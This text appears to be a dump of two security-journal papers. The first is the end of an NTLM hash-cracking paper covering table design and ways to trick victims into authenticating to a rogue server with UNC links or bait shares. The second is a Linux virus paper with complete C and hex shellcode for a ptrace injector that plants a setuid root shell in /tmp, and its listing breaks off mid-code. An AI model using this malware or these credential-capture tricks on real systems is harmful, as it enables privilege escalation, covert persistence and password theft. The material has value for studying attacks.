||||
|
||||
Src Name: BARRIERICE
|
||||
IP: 192.168.7.13
|
||||
Username: Testuser
|
||||
Primary Domain: BARRIERICE
|
||||
Native OS: Windows 2002 Service Pack 2 2600
|
||||
Long Password Hash: 3c19dcbdb400159002d8d5f8626e814564f3649f0f918666
|
||||
|
||||
|
||||
That's a Windows XP machine connecting to the rogue server running
|
||||
on Linux. The client is connecting from IP address 192.168.7.13. The
|
||||
username is ``Testuser'', the name of the host is ``BarrierIce'',
|
||||
and the password hash got captured too of course.
|
||||
|
||||
3.2) Table creation
|
||||
|
||||
|
||||
The creation of rainbow tables to precompute the hashes is a good
|
||||
approach to easily breaking the hashes now, but as harddisks grow bigger
|
||||
and bigger while costing ever less, I decided to roll my own table
|
||||
layout instead. As the reader will see, my approach requires way more
|
||||
harddisk space than rainbow tables do, but my tables are computationally
|
||||
less expensive to create and contain a determined set of data, unlike
|
||||
rainbow tables with their less than 100% probability of containing
|
||||
a certain password.
|
||||
|
||||
In order to create those tables, the big question is how to efficiently
|
||||
store all the data. In order to stay within certain bounds, I decided to
|
||||
stick to alphanumeric tables only. Alphanumeric, that's 26 chars from
|
||||
a-z, 26 chars from A-Z, and additional 10 for 0-9. That's 62 possible
|
||||
values for each character, so that's 62^7 permutations, right? Wrong.
|
||||
NTLM hashes use the LM hash as input. The LM hashing algorithm
|
||||
upper-cases its input. Therefore the possible keyspace shrinks to 36
|
||||
characters, and the number of possible permutations goes down to 36^7.
|
||||
The only other input that needs accounting is the NULL padding bytes
|
||||
used, bringing the total permutations to a bit more than 36^7.
|
||||
|
||||
The approach taken here to allow for easy storage and recovery of hashes
|
||||
and plain text is essentially to place every possible plaintext password
|
||||
into one of 2048 buckets. It could easily be expanded to more. The table
|
||||
creation tool simply generates every valid alphanumeric password, hashes
|
||||
it and checks the first 11 bits of the hash. These bits determine which
|
||||
of the 2048 buckets (implemented as files in this case) the plaintext
|
||||
password belongs to. The plaintext password is then added to the bucket.
|
||||
Now whenever a hash is captured, looking at the first 11 bits of the
|
||||
hash determines the correct bucket to look into for the password. All
|
||||
that's left to do now is hashing all the passwords in the bucket until a
|
||||
match is found. This will take on average ((36^7)/2048)/2, or
|
||||
19131876 hash operations. This takes approximately three minutes on my
|
||||
Pentium 4 2.8 GHz machine. It takes the NTLM table generation tool 94
|
||||
hours to run on my machine. Fortunately, I only had to do that once :)
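
As a rough sketch of the bucket selection described above (the function name bucket_index is an assumption made for this example, not taken from the table creation tool), the first 11 bits of a hash can be extracted like this, and the average lookup cost follows directly from the keyspace size:

```python
KEYSPACE = 36 ** 7   # alphanumeric, upper-cased, 7 characters
BUCKETS = 2048       # 2**11, one bucket per value of the first 11 hash bits


def bucket_index(hash_bytes: bytes) -> int:
    """Return the value of the first 11 bits of the hash (0..2047)."""
    # All 8 bits of the first byte plus the top 3 bits of the second byte.
    return (hash_bytes[0] << 3) | (hash_bytes[1] >> 5)


# On average half of one bucket has to be hashed before the match turns up.
average_tries = KEYSPACE // BUCKETS // 2

# First 8 bytes of the captured hash shown in section 3.1, for illustration.
sample = bytes.fromhex("3c19dcbdb4001590")
print("bucket:", bucket_index(sample))
print("average hash operations:", average_tries)
```

Using more bits of the hash would give more, smaller buckets and a correspondingly shorter search per lookup.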
|
||||
|
||||
The question is how to store more than 36^7 plaintext passwords, ranging
|
||||
in size from 0(empty password) to 7 bytes.
|
||||
|
||||
Approach 1: Store each password separated by newlines. As most passwords
|
||||
are 7 byte in size and an additional newline extends that to 8 byte, the
|
||||
outcome would be somewhere around (36^7)*8 bytes. That's roughly 584
|
||||
gigabytes, for the alphanumeric keyspace. There has to be a better way.
|
||||
|
||||
Approach 2: By storing each password with 7 bytes, be it shorter than 7
|
||||
or not, the average space required for each password goes down from 8 to
|
||||
7, as it's possible to get rid of the newlines. There's no need to
|
||||
separate passwords by newlines if they're all the same size. (36^7)*7 is
|
||||
still way too much though.
|
||||
|
||||
Approach 3: The plaintext passwords are generated by 7 nested loops. The
|
||||
first character changes all the time. The second character changes every
|
||||
time the first has exhausted the entire keyspace. The third increments
|
||||
each time the second has exhausted the keyspace and so on. What's
|
||||
interesting is that the final 3 bytes rarely change. By storing them
|
||||
only when they change, it's possible to store only the first 4 bytes of
|
||||
each password, and once in a while a marker that signals a change in the
|
||||
final 3 bytes, and is followed by the 3 byte that now form the end of
|
||||
each plaintext password up to the next marker. That's roughly (36^7)*4
|
||||
bytes = 292 gigabytes. Much better. Still too much.
|
||||
|
||||
Approach 4: For each character, there's 37 possible values. A-Z, 0-9 and
|
||||
the 0 byte. 37 different values can be expressed by 6 bits. So we can
|
||||
stuff 4 characters into 4*6 = 24 bits, which is 3 byte. How convenient!
|
||||
(37^7)*3 == 265 gigabytes. Still too much.
|
||||
|
||||
Approach 5: The passwords are being generated and stored in a
|
||||
consecutive way. The hash determines which bucket to place each new
|
||||
plaintext password into, but it's always 'bigger' than the previous one.
|
||||
Using 2048 buckets, a test showed that, within any one file, no offset
|
||||
between a password being stored and the next one stored into this bucket
|
||||
exceeded 55000. By storing offsets to the previous password instead of
|
||||
the full word, each password can be stored as a 2 byte value.
|
||||
|
||||
For example, say the first password stored into one bucket is the one
|
||||
char word "A". That's index 10 in the list of possible characters, as it
|
||||
starts with 0-9. The table creation tool would now save 10 into the
|
||||
bucket, as it's the first index from the start of the new bucket, and
|
||||
it's 10 bigger than zero, the start value for each bucket. Now if by
|
||||
chance the one character password "C" was to be stored into the same
|
||||
bucket next, the number 2 would be stored, as "C" has an offset of 2 to
|
||||
the previous password. If the next password for this bucket was "JH6",
|
||||
the offset might be 31337.
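
The offset scheme from this example can be sketched as follows. This is a minimal illustration under stated assumptions: the names encode_offsets and decode_offsets are hypothetical, and the little-endian byte order of the stored 2 byte values is my choice, since the text does not say how the tool lays them out on disk.

```python
import struct


def encode_offsets(indexes):
    """Store each password index as a 2-byte offset to the previous one."""
    out = bytearray()
    previous = 0  # every bucket starts counting from zero
    for index in indexes:
        offset = index - previous
        if not 0 <= offset <= 0xFFFF:
            raise ValueError("offset does not fit into 2 bytes")
        out += struct.pack("<H", offset)  # assumed little-endian layout
        previous = index
    return bytes(out)


def decode_offsets(blob):
    """Rebuild the absolute password indexes by summing up the offsets."""
    indexes = []
    current = 0
    for (offset,) in struct.iter_unpack("<H", blob):
        current += offset
        indexes.append(current)
    return indexes


# "A" has index 10, "C" has index 12, and the third entry lies 31337 further on.
bucket = encode_offsets([10, 12, 12 + 31337])
print(bucket.hex(), decode_offsets(bucket))
```

The scheme only works because the observed gap between neighbouring entries of a bucket stays below 65536; a larger gap would need an escape value or wider offsets.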
|
||||
|
||||
Basically each password is being stored in a base36 system, so the first
|
||||
2 byte password, being "00", has an index of 37, and all the previous
|
||||
password offsets and the offset for "00" itself of the bucket that "00"
|
||||
is being stored in add up to 37. To retrieve a password saved in this
|
||||
way requires a transformation of the decimal index back into the base36
|
||||
system, and using the resulting individual numbers as indexes into the
|
||||
char keyspace[].
|
||||
|
||||
The resulting table size is (36^7 )*2 == 146 gigabytes. Still pretty
|
||||
big, but small enough to easily fit on today's harddisks. As I mentioned
|
||||
earlier the actual resulting size is a bit bigger in fact, as a bunch of
|
||||
passwords that end with null bytes have to be stored too. In the end
|
||||
it's not 146 gigabytes, but 151 instead.
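
The size estimates for the five approaches can be checked with a few lines of arithmetic. The sketch below assumes that "gigabytes" in the text means 2^30 bytes, which is what makes the quoted figures come out; the helper name gib is made up for this example.

```python
GIB = 2 ** 30  # assumption: the text counts gigabytes as 2**30 bytes


def gib(n_bytes: int) -> int:
    """Convert a byte count to gigabytes, rounded to the nearest integer."""
    return round(n_bytes / GIB)


sizes = {
    "approach 1 (7 chars + newline)": gib(36 ** 7 * 8),
    "approach 2 (fixed 7 bytes)": gib(36 ** 7 * 7),
    "approach 3 (4 bytes + markers)": gib(36 ** 7 * 4),
    "approach 4 (6 bits per char, 37 symbols)": gib(37 ** 7 * 3),
    "approach 5 (2 byte offsets)": gib(36 ** 7 * 2),
}

for name, size in sizes.items():
    print(f"{name}: ~{size} GB")
```

The estimates for approaches 3 and 5 ignore the markers and the shorter, null-padded passwords, which is why the real table ends up slightly larger than the last figure.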
|
||||
|
||||
3.3) The big problem
|
||||
|
||||
|
||||
Now there's a big problem concerning the creation of the NTLM lookup
|
||||
tables. The first 8 byte of the final hash are derived from the first 7
|
||||
byte of the LM hash, which are derived from the first 7 byte of the
|
||||
plaintext password. Creating tables to match the first 8 byte of the
|
||||
NTLM hash to the first 7 bytes of the password is thus possible, but the
|
||||
same tables do not work for the second or even third block of the 24
|
||||
byte NTLM hash.
|
||||
|
||||
The second 8 byte chunk of the hash is derived from the last byte of the
|
||||
first LM hash, and the first 6 byte of the second LM hash. This first
|
||||
byte adds 256 possible values to the second LM hash. While the first 8
|
||||
byte chunk of the 24 byte NTLM hash stems purely from a LM hash of a
|
||||
plaintext password, the second 8 byte chunk stems from an undetermined
|
||||
byte and additional 6 byte of a LM hash.
|
||||
|
||||
Being able to look up the first up to 7 bytes of the password is a big
|
||||
advantage already though. The second part of the password, if it's
|
||||
longer than 7 bytes at all, can now usually be easily guessed or brute
|
||||
forced. Having determined that the password starts with "ILLUSTR" for
|
||||
example, most often it may end with "ATION" or "ATOR". On the other
|
||||
hand, when applying the brute force approach to this example after
|
||||
looking up the first 7 bytes, it'd require to brute force 4-5 characters
|
||||
until the final password is revealed. Even off-the-shelf hardware does
|
||||
this in seconds. While taking a bit longer, even brute forcing 6 bytes
|
||||
is nothing one couldn't sit out. 7 bytes, however, requires an
|
||||
inconvenient amount of time. That's where being able to look that part
|
||||
up as well would really come in handy. Well, guess what. There is a way.
|
||||
|
||||
3.4) Breaking the second part of the password
|
||||
|
||||
|
||||
As described earlier in this paper, the second part of the password,
|
||||
just as the first one, is used to encrypt a known string to form an 8
|
||||
byte LM hash. Knowing the challenge sent from the server to the client,
|
||||
it is possible to deduce the final 2 bytes of that LM hash out of the
|
||||
third chunk of the NTLM hash. Doing so was explained in section 2.2.
|
||||
|
||||
So the final 2 byte of the LM hash of the second half of the original
|
||||
password are known. If a similar approach to breaking the first half of
|
||||
the password is being applied now, looking up the second part of the
|
||||
password as well becomes quite possible.
|
||||
|
||||
The key here is to create a set of precomputed LanMan tables that are
|
||||
sorted by the final 2 bytes of the LM hash. So once the final 2 byte of
|
||||
the LM hash are known, a file is thus identified that contains plaintext
|
||||
passwords that when hashed result in a matching 2 byte sequence at the
|
||||
end.
|
||||
|
||||
The second chunk of the NTLM hash is derived from 6 bytes that are the
|
||||
start of the hash of one of the plaintext passwords out of the file that
|
||||
just got identified, and a single byte, the first one, which is the
|
||||
final byte of the first LM hash.
|
||||
|
||||
Considering the first part of the password broken, that byte is known.
|
||||
So all that's left to do is hash all the possible passwords in the file,
|
||||
fit the single known byte into the first position of a string and
|
||||
concatenate this one with 6 bytes from the just created hash, hashing
|
||||
those 7 bytes again and comparing the result to the second chunk of the
|
||||
NTLM hash. If it matches, the second part of the password has been
|
||||
broken too.
|
||||
|
||||
Even if looking up the first part of the password didn't prove
|
||||
successful, the method may still be applied. The only change would be
|
||||
that up to 256 possible values for the first byte would have to be
|
||||
computed and tested as well.
|
||||
|
||||
What's really interesting to note here, is that the second set of
|
||||
tables, the sorted LM tables, unlike the first set of NTLM tables, does
|
||||
NOT depend on a certain challenge. It will work with just any challenge,
|
||||
which is usually sniffed or acquired from the wire when the password hash
|
||||
and the username are being taken.
|
||||
|
||||
4) How to get the victim to log into the rogue server?
|
||||
|
||||
The big question to answer is how one can get the victim to log into the
|
||||
rogue server, thus exposing his username and password hash for the
|
||||
attacker to break.
|
||||
|
||||
Approach 1: Sending a html mail that includes a link in the form of a
|
||||
UNC path should do the trick, depending primarily on the sender's
|
||||
rhetoric ability in getting his victim to click the link, and the mail
|
||||
client to understand what it's expected to do. A UNC path is usually in
|
||||
the form of \\192.168.7.6\share, where the IP address obviously specifies
|
||||
the host to connect to, and ``share'' is a shared resource on that host.
|
||||
Due to Microsoft always being concerned about comfort first, the
|
||||
following will happen once the victim clicks the link on a Windows
|
||||
machine. The OS will try to log into the specified resource. When asked
|
||||
for a username and password, the client happily provides the current
|
||||
user's username and his hashed password to the server in an effort to
|
||||
try to log in with these credentials. No user interaction required. No
|
||||
joke.
|
||||
|
||||
Approach 2: Getting the victim to visit a site that includes a UNC path
|
||||
with Internet Explorer has the same result. An image tag whose source is such a path will do
|
||||
the trick. IE will make Windows try to log into the resource in order to
|
||||
get the image. Again, no user interaction is required. This trick does
|
||||
not work with Mozilla Firefox by the way.
|
||||
|
||||
Approach 3: If the rogue server is part of the LAN, advertising it in
|
||||
the network neighbourhood as "warez, porn, mp3, movie" - server should
|
||||
result in users trying to log into it sooner or later. There's no way
|
||||
anyone can withstand the power of the 4 elements!
|
||||
|
||||
There are plenty of other ways that the author leaves to the reader's
|
||||
imagination.
|
||||
|
||||
5) Things to remember
|
||||
|
||||
|
||||
Once a hash has been received and successfully broken, it may still not
|
||||
be the correct password, and accordingly not allow the attacker to log
|
||||
into his victim's machine. That's due to the password being hashed all
|
||||
uppercase for LM, while the MD4 based second hash actually is case
|
||||
sensitive. So a hash that's been deciphered as being "WELCOME" may
|
||||
originally have been "Welcome" or "welcome" or even "wELCOME" or
|
||||
"WeLcOme" or .. well, you get the idea. Then again, how many users
|
||||
actually apply uncommon spelling schemes?
|
||||
|
||||
6) Covering it up
|
||||
|
||||
|
||||
Having read this paper the reader should by now realize that NTLM,
|
||||
an authentication mechanism that probably most computers on this
|
||||
planet support, is actually a big threat to hosts and entire
|
||||
networks. Especially with the recently discovered remote Windows
|
||||
exploits that require valid accounts on the victim machines for the
|
||||
attacker to log into first, a worm that makes people visit a
|
||||
website, which in turn makes them log into a rogue server that
|
||||
breaks the hash and automatically exploits the victim is a
|
||||
frightening threat scenario.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Windows NT rantings from the L0pht
|
||||
http://www.packetstormsecurity.org/Crackers/NT/l0phtcrack/l0phtcrack.rant.nt.passwd.txt
|
||||
|
||||
Making a Faster Cryptanalytic Time-Memory Trade-Off
|
||||
http://lasecwww.epfl.ch/~oechslin/publications/crypto03.pdf
|
561
uninformed/3.5.txt
Normal file
|
@ -0,0 +1,561 @@
|
|||
Linux Improvised Userland Scheduler Virus
|
||||
Izik
|
||||
izik@tty64.org
|
||||
Last modified: 12/29/2005
|
||||
|
||||
1) Introduction
|
||||
|
||||
This paper discusses the combination of a userland scheduler and
|
||||
runtime process infection for a virus. These two concepts complete
|
||||
each other. The runtime process infection opens the door to invading
|
||||
into other processes, and the userland scheduler provides a way to
|
||||
make the injected code coexist with the original process code. This
|
||||
allows the virus to remain stealthy and active inside an infected
|
||||
process.
|
||||
|
||||
|
||||
2) Scheduler, Who?
|
||||
|
||||
A scheduler, in particular a process scheduler, is a kernel component
|
||||
that selects which process to run next. The scheduler is the basis
|
||||
of a multitasking operating system such as Linux. By deciding what
|
||||
process can run, the scheduler is responsible for utilizing the
|
||||
system the best way and giving the impression that multiple
|
||||
processes are simultaneously executing. A good example of using the
|
||||
scheduler in a virus, is when the fork() syscall is used to
|
||||
spawn a child process for the virus to run in. But fork()
|
||||
puts the child process out, thus it appears in the system process
|
||||
list and could attract attention.
|
||||
|
||||
|
||||
3) Userland Scheduler
|
||||
|
||||
A userland scheduler, as opposed to the kernel scheduler, runs
|
||||
inside an application scope and deals with the application threads
|
||||
and processes. The userland scheduler is still subject to the kernel
|
||||
scheduler and is meant to improve the application's multi-thread
|
||||
management. One of the major tasks that the scheduler performs is
|
||||
context switching: taking airtime from one thread and giving it to another.
|
||||
Improvising a userland scheduler inside an infected process will
|
||||
give the option of switching from the original process to the virus
|
||||
and back, without attracting too much attention on the way.
|
||||
|
||||
|
||||
4) Improvising a Userland Scheduler
|
||||
|
||||
An application that does implement a userland scheduler in it,
|
||||
provides the functions and support to do so in the code. This is a
|
||||
privilege that a virus could not easily implement smoothly. So
|
||||
improvising takes place. This raises two major problems: how and
|
||||
when. How to perform the context switching task within a code that
|
||||
has no previous support, and when the userland scheduler code can
|
||||
run to begin supervising this in the first place.
|
||||
|
||||
There are a few ways to do it. For example putting a hook on a
|
||||
function is one way. Once the program will call the function that
|
||||
has been hooked, the virus will activate and afterwards return control
|
||||
to the program. But it's not an ideal solution as there is no
|
||||
guarantee that the program will continue using it, and for how often
|
||||
or long. In order to get a wider scope that could cover the entire
|
||||
program, signals could be used.
|
||||
|
||||
Looking at the signal mechanism in Linux, it's similar to the
|
||||
interrupt mechanism, in that the kernel allows a
|
||||
program to process a signal within any place in the program code
|
||||
without any special preparation and resume back to the program flow
|
||||
once the signal handler function is done. It gives a very good way
|
||||
to perform context switching with little effort. This answers the
|
||||
"how" question, in how to perform the context switching task, using
|
||||
the signal handler function as the base function of the virus which
|
||||
will be invoked while the SIGALRM signal will be processed.
|
||||
|
||||
Adopting the signal model to our needs is supported by the
|
||||
alarm() syscall. The alarm() syscall allows the
|
||||
process to schedule the alarm signal (SIGALRM) to be
|
||||
delivered, thus making it the kernel's responsibility. Having the kernel
|
||||
constantly delivering a signal to the process hosting the virus,
|
||||
saves the virus the effort of doing it. This answers the "when"
|
||||
question for when the userland scheduler code would run. Using the
|
||||
alarm() syscall to schedule a SIGALRM to be
|
||||
delivered to the process, that in turn will call the virus function.
|
||||
This code demonstrates the functionality of alarm() and
|
||||
SIGALRM:
|
||||
|
||||
/*
|
||||
* sigalrm-poc.c, SIGALRM Proof of Concept
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
|
||||
// SIGALRM Handler
|
||||
|
||||
void shapebreaker(int ignored) {
|
||||
|
||||
// Break the cycle
|
||||
|
||||
printf("\nX\n");
|
||||
|
||||
// Schedule another one
|
||||
|
||||
alarm(5);
|
||||
|
||||
return ;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
int shape_selector = 0;
|
||||
char shape;
|
||||
|
||||
// Register for SIGALRM
|
||||
|
||||
if (signal(SIGALRM, shapebreaker) == SIG_ERR) {
|
||||
perror("signal");
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Schedule SIGALRM for 5 secs
|
||||
|
||||
alarm(5);
|
||||
|
||||
while(1) {
|
||||
// Shape selector
|
||||
|
||||
switch (shape_selector % 3) {
|
||||
|
||||
case 0:
|
||||
shape = '.';
|
||||
break;
|
||||
|
||||
case 1:
|
||||
shape = 'o';
|
||||
break;
|
||||
|
||||
case 2:
|
||||
shape = 'O';
|
||||
break;
|
||||
}
|
||||
|
||||
// Print given shape
|
||||
|
||||
printf("%c\r", shape);
|
||||
|
||||
// Increase shape index
|
||||
|
||||
shape_selector++;
|
||||
|
||||
}
|
||||
|
||||
// NEVER REACHED
|
||||
|
||||
return 1;
|
||||
}
|
||||
|
||||
The program concept is pretty simple: it prints a char from a loop,
|
||||
selecting the char via an index variable. Every five seconds or so,
|
||||
a SIGALRM is being scheduled to be delivered using the
|
||||
alarm() syscall. Once the signal has been processed the
|
||||
signal handler, which is the shapebreaker() function in
|
||||
this case, is being called and is breaking the char sequence.
|
||||
Afterwards the program continues as if nothing happened. From within
|
||||
the signal handler function, a virus can operate and once it
|
||||
returns, the program will continue flawlessly.
|
||||
|
||||
|
||||
5) Runtime Process Infection
|
||||
|
||||
Runtime infection is done using the notorious ptrace()
|
||||
syscall, which allows a process to attach to another process,
|
||||
assuming of course, that it has root privileges or has a
|
||||
parent-child relationship with it, with some exceptions. Once the
|
||||
attached process gets into debugging mode, it is possible to modify
|
||||
its registers and write/read from its address space. These are
|
||||
features that are required to slip in the virus code and activate
|
||||
it. For an in-depth review of the ptrace() injection
|
||||
method, refer to the "Building ptrace Injecting Shellcodes" article
|
||||
in Phrack 59[1].
|
||||
|
||||
5.1) The Algorithm
|
||||
|
||||
Having the motives, tools and knowledge, here's the plan:
|
||||
|
||||
Infector:
|
||||
---------
|
||||
|
||||
* Attach to process
|
||||
> Wait for process to stop
|
||||
> Query process registers
|
||||
> Calculate previous stack page beginning
|
||||
> Store current EIP
|
||||
> Inject pre-virus and virus code
|
||||
> Set EIP to pre-virus code
|
||||
> Detach from process
|
||||
|
||||
Pre-Virus:
|
||||
----------
|
||||
|
||||
* Register SIGALRM signal
|
||||
> Schedule SIGALRM (14secs)
|
||||
> Give control back to process
|
||||
|
||||
Virus:
|
||||
------
|
||||
|
||||
* SIGALRM handler invoked
|
||||
> Check for /tmp/fluffy
|
||||
> Create fluffy.c
|
||||
> Compile fluffy.c
|
||||
> Remove /tmp/fluffy.c
|
||||
> Chmod /tmp/fluffy
|
||||
> Jmp to pre-virus code
|
||||
|
||||
The infecting process is divided into two steps, the infector
|
||||
injects the virus and the pre-virus code to the infected process.
|
||||
Afterward it sets the process EIP to point to the pre-virus
|
||||
code. This independently registers to the SIGALRM signal
|
||||
within the infected process and calculates the virus location for
|
||||
the signal callback function. Then it schedules a SIGALRM
|
||||
signal and passes the control back to the process. Once the signal
|
||||
is delivered, the virus kicks in as the signal handler.
|
||||
|
||||
|
||||
5.2) Meet Fluffy
|
||||
|
||||
Code that implements the above theory:
|
||||
|
||||
/*
|
||||
* x86-fluffy-virus.c, Fluffy virus / izik@tty64.org
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
#include <sys/ptrace.h>
|
||||
#include <sys/wait.h>
|
||||
#include <linux/user.h>
|
||||
#include <linux/ptrace.h>
|
||||
|
||||
char virus_shcode[] =
|
||||
|
||||
// <_start>:
|
||||
|
||||
"\x90" // nop
|
||||
"\x90" // nop
|
||||
"\x60" // pusha
|
||||
"\x9c" // pushf
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xdb" // xor %ebx,%ebx
|
||||
"\xb0\x30" // mov $0x30,%al
|
||||
"\xb3\x0e" // mov $0xe,%bl
|
||||
"\xeb\x06" // jmp <_geteip>
|
||||
|
||||
// <_calc_eip>:
|
||||
|
||||
"\x59" // pop %ecx
|
||||
"\x83\xc1\x0d" // add $0xd,%ecx
|
||||
"\xeb\x05" // jmp <_continue>
|
||||
|
||||
// <_geteip>:
|
||||
|
||||
"\xe8\xf5\xff\xff\xff" // call <_calc_eip>
|
||||
|
||||
// <_continue>:
|
||||
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x75\x04" // jne <_resumeflow>
|
||||
"\xb0\x1b" // mov $0x1b,%al
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_resumeflow>:
|
||||
|
||||
"\x9d" // popf
|
||||
"\x61" // popa
|
||||
"\xc3" // ret
|
||||
|
||||
// <_virus>:
|
||||
|
||||
"\x55" // push %ebp
|
||||
"\x89\xe5" // mov %esp,%ebp
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xc9" // xor %ecx,%ecx
|
||||
"\xeb\x57" // jmp <_data_jmp>
|
||||
|
||||
// <_chkforfluffy>:
|
||||
|
||||
"\x5e" // pop %esi
|
||||
|
||||
// <_fixnulls>:
|
||||
|
||||
"\x3a\x46\x07" // cmp 0x7(%esi),%al
|
||||
"\x74\x0b" // je <_access>
|
||||
"\xfe\x46\x07" // incb 0x7(%esi)
|
||||
"\xfe\x46\x0a" // incb 0xa(%esi)
|
||||
"\xb0\xb3" // mov $0xb3,%al
|
||||
"\xfe\x04\x06" // incb (%esi,%eax,1)
|
||||
|
||||
// <_access>:
|
||||
|
||||
"\xb0\xa8" // mov $0xa8,%al
|
||||
"\x8d\x1c\x06" // lea (%esi,%eax,1),%ebx
|
||||
"\xb0\x21" // mov $0x21,%al
|
||||
"\xb1\x04" // mov $0x4,%cl
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x74\x31" // je <_schedule>
|
||||
|
||||
// <_fork>:
|
||||
|
||||
"\x01\xc8" // add %ecx,%eax
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x85\xc0" // test %eax,%eax
|
||||
"\x75\x1f" // jne <_waitpid>
|
||||
|
||||
// <_exec>:
|
||||
|
||||
"\x31\xd2" // xor %edx,%edx
|
||||
"\xb0\x17" // mov $0x17,%al
|
||||
"\x31\xdb" // xor %ebx,%ebx
|
||||
"\xcd\x80" // int $0x80
|
||||
"\xb0\x0b" // mov $0xb,%al
|
||||
"\x89\xf3" // mov %esi,%ebx
|
||||
"\x52" // push %edx
|
||||
"\x8d\x7e\x0b" // lea 0xb(%esi),%edi
|
||||
"\x57" // push %edi
|
||||
"\x8d\x7e\x08" // lea 0x8(%esi),%edi
|
||||
"\x57" // push %edi
|
||||
"\x56" // push %esi
|
||||
"\x89\xe1" // mov %esp,%ecx
|
||||
"\xcd\x80" // int $0x80
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x40" // inc %eax
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_waitpid>:
|
||||
|
||||
"\x89\xc3" // mov %eax,%ebx
|
||||
"\x31\xc0" // xor %eax,%eax
|
||||
"\x31\xc9" // xor %ecx,%ecx
|
||||
"\xb0\x07" // mov $0x7,%al
|
||||
"\xcd\x80" // int $0x80
|
||||
|
||||
// <_schedule>:
|
||||
|
||||
"\xc9" // leave
|
||||
"\xe9\x7c\xff\xff\xff" // jmp <_start>
|
||||
|
||||
// <_data_jmp>:
|
||||
|
||||
"\xe8\xa4\xff\xff\xff" // call <_chkforfluffy>
|
||||
|
||||
//
|
||||
// /bin/sh\xff-c\xff
|
||||
// echo "int main() { setreuid(0, 0); system(\"/bin/bash\"); return 1; }" > /tmp/fluffy.c ;
|
||||
// cc -o /tmp/fluffy /tmp/fluffy.c ;
|
||||
// rm -rf /tmp/fluffy.c ;
|
||||
// chmod 4755 /tmp/fluffy\xff
|
||||
//
|
||||
|
||||
// <_data_sct>:
|
||||
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68\xff\x2d\x63\xff\x65\x63\x68\x6f\x20"
|
||||
"\x22\x69\x6e\x74\x20\x6d\x61\x69\x6e\x28\x29\x20\x7b\x20\x73\x65"
|
||||
"\x74\x72\x65\x75\x69\x64\x28\x30\x2c\x20\x30\x29\x3b\x20\x73\x79"
|
||||
"\x73\x74\x65\x6d\x28\x5c\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
|
||||
"\x5c\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x31\x3b\x20\x7d"
|
||||
"\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e"
|
||||
"\x63\x20\x3b\x20\x63\x63\x20\x2d\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
|
||||
"\x6c\x75\x66\x66\x79\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75\x66\x66"
|
||||
"\x79\x2e\x63\x20\x3b\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x74\x6d"
|
||||
"\x70\x2f\x66\x6c\x75\x66\x66\x79\x2e\x63\x20\x3b\x20\x63\x68\x6d"
|
||||
"\x6f\x64\x20\x34\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x66\x6c\x75"
|
||||
"\x66\x66\x79\xff";
|
||||
|
||||
int ptrace_inject(pid_t, long, void *, int);
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
pid_t pid;
|
||||
struct user_regs_struct regs;
|
||||
long infproc_addr;
|
||||
|
||||
if (argc < 2) {
|
||||
printf("usage: %s <pid>\n", argv[0]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
pid = atoi(argv[1]);
|
||||
|
||||
// Attach to the process
|
||||
|
||||
if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) {
|
||||
perror(argv[1]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Wait for a process to stop
|
||||
|
||||
if (waitpid(pid, NULL, 0) < 0) {
|
||||
perror(argv[1]);
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Query process registers
|
||||
|
||||
if (ptrace(PTRACE_GETREGS, pid, &regs, &regs) < 0) {
|
||||
perror("Oopsie");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
printf("Original ESP: 0x%.8lx\n", regs.esp);
|
||||
printf("Original EIP: 0x%.8lx\n", regs.eip);
|
||||
|
||||
// Push original EIP on stack for virus to RET
|
||||
|
||||
regs.esp -= 4;
|
||||
|
||||
ptrace(PTRACE_POKETEXT, pid, regs.esp, regs.eip);
|
||||
|
||||
// Calculate the previous stack page top address
|
||||
|
||||
infproc_addr = (regs.esp & 0xFFFFF000) - 0x1000;
|
||||
|
||||
printf("Injection Base: 0x%.8lx\n", infproc_addr);
|
||||
|
||||
// Inject virus code
|
||||
|
||||
if (ptrace_inject(pid, infproc_addr, virus_shcode, sizeof(virus_shcode) - 1) < 0) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
// Change EIP to point over virus shcode
|
||||
|
||||
regs.eip = infproc_addr + 2;
|
||||
|
||||
printf("Current EIP: 0x%.8lx\n", regs.eip);
|
||||
|
||||
// Set process registers (EIP changed)
|
||||
|
||||
if (ptrace(PTRACE_SETREGS, pid, &regs, &regs) < 0) {
|
||||
perror("Oopsie");
|
||||
ptrace(PTRACE_DETACH, pid, NULL, NULL);
|
||||
return -1;
|
||||
}
|
||||
|
||||
// It's fluffy time!
|
||||
|
||||
if (ptrace(PTRACE_DETACH, pid, NULL, NULL) < 0) {
|
||||
perror("Oopsie");
|
||||
return -1;
|
||||
}
|
||||
|
||||
